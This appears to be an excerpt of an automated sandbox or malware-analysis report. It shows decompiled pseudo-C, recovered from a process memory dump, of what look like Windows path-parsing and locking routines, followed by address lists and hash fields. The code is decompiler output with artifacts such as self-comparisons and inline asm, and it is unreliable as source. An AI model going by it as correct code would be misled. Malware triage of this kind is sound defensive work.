									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M00FC45F8))) {
												case 0:
													_v568 = 0xf81078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0xf811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L00FC4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E00FEF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E00FEF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E00FA52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E00FBEB70(1, 0x10979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E00FBAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E00FE95D0();
																			L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E00FEB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E00FE3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E00FEB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x00fc4128
0x00fc4135
0x00fc413c
0x00fc4141
0x00fc4145
0x00fc4147
0x00fc414e
0x00fc4151
0x00fc4159
0x00fc415c
0x00fc4160
0x00fc4164
0x00fc4168
0x00fc416c
0x00fc417f
0x00fc4181
0x00fc446a
0x00fc446a
0x00fc418c
0x00fc4195
0x00fc4199
0x00fc4432
0x00fc4439
0x00fc443d
0x00fc4442
0x00fc4447
0x00000000
0x00fc419f
0x00fc41a3
0x00fc41b1
0x00fc41b9
0x00fc41bd
0x00fc45db
0x00fc45db
0x00000000
0x00fc41c3
0x00fc41c3
0x00fc41ce
0x00fc41d4
0x0100e138
0x0100e13e
0x0100e169
0x0100e16d
0x0100e19e
0x0100e16f
0x0100e16f
0x0100e175
0x0100e179
0x0100e18f
0x0100e193
0x00000000
0x0100e199
0x00000000
0x0100e199
0x0100e193
0x00000000
0x00000000
0x00000000
0x00fc41da
0x00fc41da
0x00fc41df
0x00fc41e4
0x00fc41ec
0x00fc4203
0x00fc4207
0x0100e1fd
0x00fc4222
0x00fc4226
0x0100e1f3
0x0100e1f3
0x00fc422c
0x00fc422c
0x00fc4233
0x0100e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc4239
0x00fc4239
0x00fc4239
0x00fc4239
0x00fc4233
0x00fc4226
0x00fc41ee
0x00fc41ee
0x00fc41f4
0x00fc4575
0x0100e1b1
0x0100e1b1
0x00000000
0x00fc457b
0x00fc457b
0x00fc4582
0x0100e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc4588
0x00fc4588
0x00fc458c
0x0100e1c4
0x0100e1c4
0x00000000
0x00fc4592
0x00fc4592
0x00fc4599
0x0100e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc459f
0x00fc459f
0x00fc45a3
0x0100e1d7
0x0100e1e4
0x00000000
0x00fc45a9
0x00fc45a9
0x00fc45b0
0x0100e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc45b6
0x00fc45b6
0x00fc45b6
0x00000000
0x00fc45b6
0x00fc45b0
0x00fc45a3
0x00fc4599
0x00fc458c
0x00fc4582
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc41f4
0x00fc423e
0x00fc4241
0x00fc45c0
0x00fc45c4
0x00000000
0x00fc45ca
0x00fc45ca
0x00000000
0x0100e207
0x0100e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc45d1
0x00000000
0x00000000
0x00fc45ca
0x00000000
0x00fc4247
0x00fc4247
0x00fc4247
0x00fc4249
0x00fc4249
0x00fc4249
0x00fc4251
0x00fc4251
0x00fc4257
0x00fc425f
0x00fc426e
0x00fc4270
0x00fc427a
0x0100e219
0x0100e219
0x00fc4280
0x00fc4282
0x00fc4456
0x00fc45ea
0x00000000
0x00fc45f0
0x0100e223
0x00000000
0x0100e223
0x00fc445c
0x00fc445c
0x00000000
0x00fc445c
0x00000000
0x00fc4288
0x00fc428c
0x0100e298
0x00fc4292
0x00fc4292
0x00fc429e
0x00fc42a3
0x00fc42a7
0x00fc42ac
0x0100e22d
0x00fc42b2
0x00fc42b2
0x00fc42b9
0x00fc42bc
0x00fc42c2
0x00fc42ca
0x00fc42cd
0x00fc42cd
0x00fc42d4
0x00fc433f
0x00fc433f
0x00fc42d6
0x00fc42d6
0x00fc42d9
0x00fc42dd
0x00fc42eb
0x0100e23a
0x00fc42f1
0x00fc4305
0x00fc430d
0x00fc4315
0x00fc4318
0x00fc431f
0x00fc4322
0x00fc432e
0x00fc433b
0x00fc433b
0x00000000
0x00fc432e
0x00fc42eb
0x00fc434c
0x00fc434e
0x00fc4352
0x00fc4359
0x00fc435e
0x00fc4361
0x00fc436e
0x00fc438a
0x00fc438e
0x00fc4396
0x00fc439e
0x00fc43a1
0x00fc43ad
0x00fc43bb
0x00fc43bb
0x00fc43ad
0x00fc436e
0x00fc43bf
0x00fc43c5
0x00fc4463
0x00fc4463
0x00fc43ce
0x00fc43d5
0x00fc43d9
0x00fc43df
0x00fc4475
0x00fc4479
0x00fc4491
0x00fc4491
0x00fc4479
0x00fc43e5
0x00fc43eb
0x00fc43f4
0x00fc43f6
0x00fc43f9
0x00fc43fc
0x00fc43ff
0x00fc44e8
0x00fc44ed
0x00fc44f3
0x0100e247
0x00000000
0x00fc44f9
0x00fc4504
0x00fc4508
0x00fc450f
0x0100e269
0x00000000
0x00fc4515
0x00fc4519
0x00fc4531
0x00fc4534
0x00fc4537
0x00fc453e
0x00fc4541
0x00fc454a
0x0100e255
0x0100e255
0x0100e25b
0x0100e25e
0x0100e261
0x0100e261
0x00fc4555
0x00fc4559
0x00fc455d
0x0100e26d
0x0100e270
0x0100e274
0x0100e27a
0x0100e27d
0x0100e28e
0x0100e28e
0x00fc4563
0x00fc4563
0x00fc4569
0x00fc4569
0x00000000
0x00fc455d
0x00fc450f
0x00000000
0x00fc44f3
0x00fc43ff
0x00fc4405
0x00fc4405
0x00fc4405
0x00fc42ac
0x00fc428c
0x00fc4282
0x00fc4407
0x00fc440d
0x0100e2af
0x0100e2af
0x00fc4413
0x00fc4413
0x00000000
0x00fc41d4
0x00000000
0x00fc41c3
0x00fc41bd
0x00fc4415
0x00fc4415
0x00fc4416
0x00fc4417
0x00fc4429
0x00fc416e
0x00fc416e
0x00fc4175
0x00fc4498
0x00fc449f
0x0100e12d
0x00000000
0x0100e133
0x00000000
0x0100e133
0x00fc44a5
0x00fc44a5
0x00fc44aa
0x00000000
0x00fc44bb
0x00fc44ca
0x00fc44d6
0x00fc44d7
0x00fc44d8
0x00fc44e3
0x00fc44e3
0x00fc44aa
0x00fc417b
0x00fc417b
0x00fc417b
0x00000000
0x00fc417b
0x00fc4175
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d7dbc7437f4f94bf3811afec64312b879c26ec83964dfbf1f381554c4876cb
Instruction ID: a1878288246bbdebd9b97f62bcf65f298ced8922cda3a443e262be1ead325610
Opcode Fuzzy Hash: f5d7dbc7437f4f94bf3811afec64312b879c26ec83964dfbf1f381554c4876cb
Instruction Fuzzy Hash: 40F1AE719082528FD729CF19C592B7AB7E1FF88714F14496EF886C7290E734E881EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00FD20A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00FD20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1098714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E00FD2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E00FD2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E00FA58EC(_t240);
									_t221 =  *0x1095cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1095cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E00FE4A2C(0x1096e40, 0xfe4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E00FC7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0xf85c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E00FDF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E00FDF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01027016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L00FC2400(_t267 + 0x20);
															}
															L00FC2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E00FD2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E00FC2280(_t134, 0x1098608);
									__eflags =  *0x1096e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E00FBFFB0(_t198, _t241, 0x1098608);
										__eflags = _t253;
										if(_t253 != 0) {
											L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1096e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1098608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E00FD6B90(_t210,  &_v64);
										_t262 =  *0x1098608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E00FDE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E00FE97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E00FE006A(0x1098608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1098608);
												E00FEB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1096904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1096e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E00FBFFB0(_t198, _t240, 0x1098608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E00FE00C2(0x1098608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x00fd20a0
0x00fd20a8
0x00fd20ad
0x00fd20b3
0x00fd20b8
0x00fd20c2
0x00fd20c7
0x00fd20cb
0x00fd20d2
0x00fd2263
0x00fd2266
0x01015836
0x01015836
0x00000000
0x00fd226c
0x00fd226c
0x00fd2270
0x00fd2274
0x00fd20e2
0x00fd20e2
0x00fd20e6
0x00fd20ee
0x010157dc
0x010157de
0x010157ec
0x010157ec
0x010157f1
0x010157f3
0x010157f8
0x00000000
0x010157f8
0x010157e0
0x010157e4
0x010157ea
0x00000000
0x00000000
0x00000000
0x010157ea
0x00fd20f4
0x00fd20f4
0x00fd20f8
0x00fd20f8
0x00fd20fc
0x00fd2100
0x00fd2106
0x00fd2201
0x00fd2206
0x00fd220b
0x00fd220e
0x00fd22a9
0x00fd22ac
0x00000000
0x00000000
0x00fd22b2
0x00fd22b5
0x01015801
0x01015806
0x00000000
0x00000000
0x01015810
0x01015815
0x01015818
0x00000000
0x00000000
0x0101581e
0x00fd22bb
0x00fd22bb
0x00fd2218
0x00fd2218
0x00fd221c
0x00fd2220
0x00fd2222
0x00fd22c2
0x00fd22c4
0x00fd22dc
0x00fd22dc
0x00fd22e1
0x00000000
0x00000000
0x00000000
0x00fd22e7
0x00fd22c8
0x00fd22cd
0x00fd22d3
0x00fd22d6
0x01015823
0x01015825
0x01015827
0x00000000
0x00000000
0x0101582d
0x00000000
0x0101582d
0x00000000
0x00fd2228
0x00fd2228
0x00000000
0x00fd2228
0x00fd2222
0x00fd2214
0x00fd2214
0x00000000
0x00fd2114
0x00fd2114
0x00fd2114
0x00fd211a
0x00fd211c
0x00fd2348
0x00fd234d
0x01015840
0x01015845
0x01015848
0x0101584e
0x0101584e
0x01015848
0x00fd2353
0x00fd2355
0x00fd2388
0x00fd2388
0x00fd2368
0x00fd236a
0x00fd236c
0x00fd238f
0x00000000
0x00fd236e
0x00fd236e
0x00fd218e
0x00fd218e
0x00fd2191
0x00fd2195
0x01015a03
0x01015a06
0x01015a0c
0x01015a0f
0x01015a11
0x01015a13
0x01015a13
0x01015a19
0x01015a1f
0x00000000
0x00fd219b
0x00fd219b
0x00fd21a0
0x00fd2282
0x00fd2284
0x00fd2284
0x00fd2284
0x00fd2284
0x00fd21a6
0x00fd21a9
0x00fd21ac
0x00fd21ae
0x00fd21b3
0x00fd228b
0x00fd2290
0x00fd2379
0x00fd2296
0x00fd2298
0x00fd2298
0x00fd2290
0x00fd21b9
0x00fd21be
0x00fd22a2
0x00fd22a2
0x00fd21c4
0x00fd21c8
0x00fd21cc
0x00fd21d0
0x00fd21d4
0x00fd21de
0x00fd21e3
0x01015a29
0x01015a2c
0x00000000
0x00000000
0x01015a3b
0x00000000
0x00fd21e9
0x00fd21e9
0x00fd21e9
0x00fd21ee
0x00fd21f1
0x01015a45
0x01015a4b
0x01015a52
0x01015a58
0x01015a5d
0x01015a5f
0x01015a71
0x01015a61
0x01015a6a
0x01015a6a
0x01015a76
0x01015a79
0x01015a7f
0x01015a83
0x01015a85
0x01015a87
0x01015a87
0x01015a8c
0x01015a91
0x01015a97
0x01015a9f
0x01015aa0
0x01015aa1
0x01015aa6
0x01015aab
0x01015ab1
0x01015ab3
0x01015ab9
0x01015aca
0x01015ad4
0x01015ad4
0x01015ade
0x01015ade
0x01015aab
0x01015a79
0x01015a52
0x00fd21f7
0x00fd21f9
0x00fd21fe
0x00fd21fe
0x00fd21e3
0x00fd2195
0x00fd236c
0x00fd2122
0x00fd2122
0x00fd2124
0x00fd2231
0x00fd2236
0x00fd2236
0x00fd2238
